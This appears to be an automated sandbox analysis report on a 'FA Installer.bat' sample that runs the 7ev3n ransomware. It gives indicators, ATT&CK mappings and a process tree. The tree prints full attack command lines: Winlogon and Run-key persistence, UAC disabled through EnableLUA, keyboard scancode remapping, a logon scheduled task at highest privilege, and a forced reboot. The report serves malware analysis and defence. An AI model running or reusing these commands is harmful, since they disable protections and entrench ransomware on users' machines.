Analysis
max time kernel: 697s
max time network: 698s
platform: windows10-2004_x64
resource: win10v2004-20240412-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-04-2024 16:55
Static task: static1
Behavioral task: behavioral1
  Sample: FA Installer.bat
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: FA Installer.bat
  Resource: win10v2004-20240412-en
Errors
General
Target: FA Installer.bat
Size: 42KB
MD5: ac48f9875234a4e5649d152672903198
SHA1: 6795362296194a79770a385a1a81efa89c6fe203
SHA256: e5f0efdb833e0b8ec06d88d13039ac9ab2b46a70a26a6c9c07868a79b8f11f62
SHA512: b5a8cf484eca8afde45a78b6768970a3ccd9f4731f4f9a227ac22e02cb3c9c158c8221c136fef191ce9967b2b4bc8c7f4aa6a4310e04dc5e3e5b8b7fc712df44
SSDEEP: 768:lnwnjP9zogqnrT9AHuhUcKhnuxGTBmF5p8yJVS5LTf+iA0:FI89nf9tUc+nuxGIFwyKhTf+r0
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | reg.exe
UAC bypass
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | cmd.exe
Executes dropped EXE 1 IoCs
Processes:
pid | process
752 | system.exe
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | reg.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
Processes:
flow | ioc
200 | camo.githubusercontent.com
208 | camo.githubusercontent.com
209 | camo.githubusercontent.com
211 | camo.githubusercontent.com
226 | raw.githubusercontent.com
227 | raw.githubusercontent.com
228 | raw.githubusercontent.com
229 | raw.githubusercontent.com
225 | raw.githubusercontent.com
230 | raw.githubusercontent.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 13 IoCs
Processes:
pid | process
1240, 1456, 4508, 1296, 3576, 5100, 1892, 1304, 3944, 3996, 2704, 2592, 4584 | timeout.exe
Kills process with taskkill 1 IoCs
Processes:
pid | process
4324 | taskkill.exe
Modifies data under HKEY_USERS 15 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "237" | LogonUI.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | LogonUI.exe
Modifies registry class 4 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings | cmd.exe
Key created | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings | firefox.exe
Key created | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings | cmd.exe
Key created | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings | OpenWith.exe
NTFS ADS 1 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\Downloads\7ev3n.zip:Zone.Identifier | firefox.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
pid | process
2244 | powershell.exe
2244 | powershell.exe
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 2244 | powershell.exe
Token: SeDebugPrivilege | 1132 | firefox.exe
Token: SeDebugPrivilege | 1132 | firefox.exe
Token: SeDebugPrivilege | 1132 | firefox.exe
Token: SeDebugPrivilege | 4324 | taskkill.exe
Token: SeShutdownPrivilege | 3772 | shutdown.exe
Token: SeRemoteShutdownPrivilege | 3772 | shutdown.exe
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid | process
1132 | firefox.exe
1132 | firefox.exe
1132 | firefox.exe
1132 | firefox.exe
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
pid | process
1132 | firefox.exe
1132 | firefox.exe
1132 | firefox.exe
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
pid | process
1132 | firefox.exe
1132 | firefox.exe
1132 | firefox.exe
1132 | firefox.exe
4484 | OpenWith.exe
1536 | LogonUI.exe
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(each entry gives the image path, then the command line; indentation and the bracketed number show parent/child depth)

[1] C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FA Installer.bat"
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\WScript.exe
        cmdline: "C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAinfo4.vbs"
    [2] C:\Windows\System32\WScript.exe
        cmdline: "C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAinfo3.vbs"
    [2] C:\Windows\System32\WScript.exe
        cmdline: "C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAinfo2.vbs"
    [2] C:\Windows\System32\WScript.exe
        cmdline: "C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAinfo1.vbs"
    [2] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /K "C:\FA_Antivira\FAshortcutinstallerdesktop.bat"
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\Admin\Desktop\FA Security.lnk');$s.TargetPath='C:\FA_Antivira\Fabi_Antivira_Securety.bat';$s.Save()"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\system32\timeout.exe
        cmdline: timeout /t 1
        - Delays execution with timeout.exe
    [2] C:\Windows\system32\timeout.exe
        cmdline: timeout /t 1
        - Delays execution with timeout.exe
    [2] C:\Windows\system32\timeout.exe
        cmdline: timeout /t 1
        - Delays execution with timeout.exe
    [2] C:\Windows\system32\timeout.exe
        cmdline: timeout /t 1
        - Delays execution with timeout.exe
    [2] C:\Windows\system32\timeout.exe
        cmdline: timeout /t 1
        - Delays execution with timeout.exe
    [2] C:\Windows\system32\timeout.exe
        cmdline: timeout /t 1
        - Delays execution with timeout.exe
    [2] C:\Windows\system32\timeout.exe
        cmdline: timeout /t 1
        - Delays execution with timeout.exe
    [2] C:\Windows\system32\timeout.exe
        cmdline: timeout /t 1
        - Delays execution with timeout.exe
    [2] C:\Windows\system32\timeout.exe
        cmdline: timeout /t 1
        - Delays execution with timeout.exe
    [2] C:\Windows\system32\timeout.exe
        cmdline: timeout /t 1
        - Delays execution with timeout.exe
    [2] C:\Windows\system32\timeout.exe
        cmdline: timeout /t 1
        - Delays execution with timeout.exe
    [2] C:\Windows\System32\WScript.exe
        cmdline: "C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAwlc.vbs"
    [2] C:\Windows\system32\timeout.exe
        cmdline: timeout /t 60
        - Delays execution with timeout.exe

[1] C:\Program Files\Mozilla Firefox\firefox.exe
    cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe"
    - Suspicious use of WriteProcessMemory
    [2] C:\Program Files\Mozilla Firefox\firefox.exe
        cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe"
        - Checks processor information in registry
        - Modifies registry class
        - NTFS ADS
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.0.2052635877\1622097830" -parentBuildID 20230214051806 -prefsHandle 1772 -prefMapHandle 1764 -prefsLen 22244 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e54d9ee-7ee0-4365-916f-53df822b8f96} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 1852 1810522d758 gpu
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.1.76159362\300292943" -parentBuildID 20230214051806 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 22280 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f402f48-2618-427d-836a-c05e4ee374ac} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 2420 1810577a458 socket
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.2.869977666\400153086" -childID 1 -isForBrowser -prefsHandle 3016 -prefMapHandle 2820 -prefsLen 22318 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60645fe7-9d7f-4661-9639-a682db2d5760} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 2740 18107bf3d58 tab
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.3.174865325\309931989" -childID 2 -isForBrowser -prefsHandle 3480 -prefMapHandle 1360 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf9139b2-4c75-418d-aa71-9e55d2c6f000} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 3768 1810a365658 tab
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.4.963962890\749644247" -childID 3 -isForBrowser -prefsHandle 4888 -prefMapHandle 4864 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd50c3e5-eebc-4f94-baca-28e6da3f7f00} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 4828 1810cc86558 tab
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.5.1845527900\1414269610" -childID 4 -isForBrowser -prefsHandle 5244 -prefMapHandle 5248 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54741bf6-6264-4051-ace5-0de871294eed} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 5236 1810cc87d58 tab
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.6.116301782\1855921897" -childID 5 -isForBrowser -prefsHandle 5440 -prefMapHandle 5444 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7a519bd-71ea-4102-b905-5c9ceb5ede91} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 5428 1810cc89558 tab
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.7.2024065354\1970252890" -childID 6 -isForBrowser -prefsHandle 5872 -prefMapHandle 2692 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f29fea3b-3e3e-4c0a-b59a-ce13b89cd610} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 5024 1810acba158 tab
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.8.1318373792\1904729572" -childID 7 -isForBrowser -prefsHandle 6076 -prefMapHandle 6080 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0da376a4-f7c0-4c33-a281-acffeba05f76} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 2548 1810dd5a258 tab

[1] C:\Windows\System32\rundll32.exe
    cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

[1] C:\Users\Admin\Desktop\Endermanch@7ev3n.exe
    cmdline: "C:\Users\Admin\Desktop\Endermanch@7ev3n.exe"
    [2] C:\Users\Admin\AppData\Local\system.exe
        cmdline: "C:\Users\Admin\AppData\Local\system.exe"
        - Executes dropped EXE
        [3] C:\Windows\SysWOW64\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
        [3] C:\Windows\SysWOW64\SCHTASKS.exe
            cmdline: C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
            - Creates scheduled task(s)
        [3] C:\windows\SysWOW64\cmd.exe
            cmdline: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                - Modifies WinLogon for persistence
        [3] C:\windows\SysWOW64\cmd.exe
            cmdline: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                - Adds Run key to start application
        [3] C:\windows\SysWOW64\cmd.exe
            cmdline: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
        [3] C:\windows\SysWOW64\cmd.exe
            cmdline: C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
        [3] C:\windows\SysWOW64\cmd.exe
            cmdline: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
        [3] C:\windows\SysWOW64\cmd.exe
            cmdline: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                - UAC bypass
        [3] C:\Windows\SysWOW64\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
        [3] C:\Windows\SysWOW64\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
            [4] C:\Windows\SysWOW64\shutdown.exe
                cmdline: shutdown -r -t 10 -f
                - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ""C:\FA_Antivira\Fabi_Antivira_Securety.bat" "
    - Checks computer location settings
    - Modifies registry class
    [2] C:\Windows\System32\WScript.exe
        cmdline: "C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAwlc.vbs"
    [2] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /K "C:\FA_Antivira\FASecLogsTxT\FAupLOG.bat"
        [3] C:\Windows\system32\timeout.exe
            cmdline: timeout /t 5
            - Delays execution with timeout.exe
    [2] C:\Windows\System32\WScript.exe
        cmdline: "C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAvbs\FAbuttenUser.vbs"
    [2] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /K "C:\FA_Antivira\FAcmd.bat"
        [3] C:\Windows\system32\taskkill.exe
            cmdline: taskkill /f /im cmd.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\OpenWith.exe
    cmdline: C:\Windows\system32\OpenWith.exe -Embedding
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx

[1] C:\Windows\system32\LogonUI.exe
    cmdline: "LogonUI.exe" /flags:0x4 /state0:0xa38f7055 /state1:0x41c64e6d
    - Modifies data under HKEY_USERS
    - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Scheduled Task/Job (1)
Downloads
6KB
MD5c682648e7c3b36078ccf597529d393e0
SHA18e6dae64af3b8d0d43d7adb7a89eab67d11a98d1
SHA2567a7e99090e02611d7187dcf5f160215abff51258b8c99d79200990aefa6c8de9
SHA512503b340da2efbb3749739346059694f5503fdb6dded29f19980776527e1896dc95cc5f41a9378fc49712d0e70b1cf311d9d0d89dc8975ef6513cfee6f8bb975a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\prefs.jsFilesize
7KB
MD5e7c196c96735923f52a5e36eb9f3fe55
SHA1afecbedf9f802ae75d421996ff89257654b43806
SHA2569ebf5f587a6ec6f64c2472886b8f5e0b528895eb4e96b0701add0c0f4e99e3aa
SHA512d669221b817efad602d9debd4335013756b5fff859345bdc01d33b7a312db9f8cd97507e168beed36e33482d71eb9671e9de8d0a4bbe04a17f0231446d8871ce
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\sessionCheckpoints.json.tmpFilesize
259B
MD5e6c20f53d6714067f2b49d0e9ba8030e
SHA1f516dc1084cdd8302b3e7f7167b905e603b6f04f
SHA25650a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092
SHA512462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\sessionstore-backups\recovery.jsonlz4Filesize
3KB
MD53618946c468e8c76eba39b00ba90fcd4
SHA19b98445621578fd85ae09aab998cb8d55f745f39
SHA2561d3f7e3644e1ee73658635df854ff70698e445613ff841089f6163803ce8dbbc
SHA512a6ed83b3aeb6375119bebf0405216fad7dbac3ccbdd338a2745dfeddf46103ba71a4362f6d81546a34983bb741c797b6bf62cff1b860c890ec8e45ea8ce4b36a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\sessionstore-backups\recovery.jsonlz4Filesize
8KB
MD53312767e2a127323c24d6cd44565f383
SHA1165f36aed4c7c61842f72c1d0ab04447a1f8b705
SHA256643b865de45e39c73470dc1ae31f8552b325f929ae449fb225376d5312c6cfc2
SHA512a485d1661aca1cb8f52bfd020b1490b13054ed0ee9075e3a8211a1d5ab4de08771b4a9ba16f85a2360a342908dae36cc6f7b5c8d219f358e11631ba8e01947b4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\sessionstore-backups\recovery.jsonlz4Filesize
5KB
MD55e4080b11534a806740a495a7658cdd3
SHA1c1bce0a882a76da2bc98a318bbced592d96c6d52
SHA2561ea9ffc00cdbc3b23cd585536d5b9aa6160149c1c14b265ad721487a896f0526
SHA512003c344e95e8b37dab93ca8f6369436172a3351651415d4158f0f08c34c998d440bb9c0963489b59534309cf53a889c93bd951891b57dd06ed15273aa180fded
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\sessionstore.jsonlz4Filesize
8KB
MD54762241e4f6ddbcca24cab09baacd672
SHA114c16041a48925b04c5fff6846a7c87720743081
SHA25665196548070bff42a860cbca39e914fd865bee3454da1de9571e7ec72a112feb
SHA512dc3d82d181d4aa2d718e2bcf744a828385d9b58cc4160798f76d44cf17016081deee11f75b430ac5611830e8ff03f2c4e11f4ce0b4eb90f393b0b0278e190237
-
C:\Users\Admin\Downloads\7ev3n.NHqhRU4J.zip.partFilesize
31KB
MD5c686b8f6e0df311445c5feb88f3e8835
SHA10338d0093e5a8f05b04b6f601e96a714ef97d252
SHA256a917acfdf0ceed0e37f0c698a6c47655123cb97dd917e961937e833265a11308
SHA512c4b3e7d041a23c5379f2ef8f2c46581004d39fdef16c68636b51aa5832871e9b6d22d514120fb52dadeaf61613218917034d695338b3837c71f3ff34bdecfc0b
-
C:\Users\Admin\Downloads\7ev3n.zipFilesize
139KB
MD585a5c7b6d0e7b7451295278a9bb40eb0
SHA177a258417a7294cc354bc4d883f0537de8dea579
SHA256be1fd9cb06b2083b60f4878a1c6de0ae41e22b25daa2478634f9d6d8df9f92ca
SHA5123db3c96fbcacf33c75ba9dd3b2f8fb3218031d10da4acb844fe10a8115488fffbedff6c42dc15a643d07f5ce630d4c16babc0ade3bbd3d1ce94fb319e432df8c
-
memory/2244-81-0x00000182B3BE0000-0x00000182B3BF0000-memory.dmpFilesize
64KB
-
memory/2244-74-0x00000182B3BA0000-0x00000182B3BC2000-memory.dmpFilesize
136KB
-
memory/2244-80-0x00000182B3BE0000-0x00000182B3BF0000-memory.dmpFilesize
64KB
-
memory/2244-79-0x00007FF84CA60000-0x00007FF84D521000-memory.dmpFilesize
10.8MB
-
memory/2244-86-0x00007FF84CA60000-0x00007FF84D521000-memory.dmpFilesize
10.8MB